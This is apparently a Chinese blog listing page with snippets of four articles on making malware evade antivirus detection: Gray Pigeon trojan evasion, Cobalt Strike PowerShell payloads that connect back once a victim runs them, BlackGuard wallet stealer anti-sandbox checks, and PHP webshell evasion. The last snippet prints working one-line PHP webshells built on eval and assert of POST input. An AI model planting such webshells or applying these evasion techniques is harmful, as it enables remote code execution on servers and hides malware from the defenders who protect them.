查询到最新的4条

木马免杀原理及方法(超全)

灰鸽子免杀 概况   免杀意为免除被杀毒 软件杀掉的软件。   灰鸽子免杀简介:本工具为纯绿色工具,软件采用独特的查杀技巧可完全查杀灰鸽子全系列(VIP2005、vip2006、免杀处理) 木马,本软件已经过严格测试,备用本工具可以让您免受 灰鸽子木马的困饶.更新内容:软件增加在线更新功能,增加对VIP2006系列及免杀处理的鸽子的查杀。 编辑本段原理解析 灰鸽子免杀原理免杀技术全揭密   一.关于免杀的来源   为了让我们的木马在各种杀毒软件的威胁下活的更 继续阅读

免杀-PowerShell

powershell win自带defender杀毒工具,所以defender和powershell用的同一种语言,很容易被查杀,所以我们尽量就不要用powershell cs生成payload--powershell、命令模式 如果是powershell脚本,只要对方执行就能上线,如果是cmd,先输入powershell,然后payload.ps1 1、文件模式-上线代码在文件重&#xff 继续阅读

恶意软件免杀与技术(2022.04.25)

BlackGuard加密货币钱包窃取 规避以下dll的加载 SbieDll.dll 沙盒沙盒 SxIn.dll 360全方位安全 Sf2.dll Avast 杀毒软件 snxhk.dll Avast 杀毒软件 cmdvrt32.dll COMODO 网络安全 使用Obfuscar进行.NET程序混淆 BlackGuard 还将查询“IP-Whois”以确定受害者的大致位置。在 BlackGuard 的一些样本中,此功能用于防止恶意软件在特定的东欧国家执行。 通过Chrome插件ID找到加密 继续阅读

免杀实战之面向PHP的WebShell免杀

0X00普通的一句话木马 <pre id="PTXkG"><?php eval($_POST['a']); ?> //函数的相似替换 <?php assert($_POST['a']); ?></pre> <?php @eval($_POST['110']);?>与第一个一句话木马相比多了一个"@“字符,我们发现这个字符的 继续阅读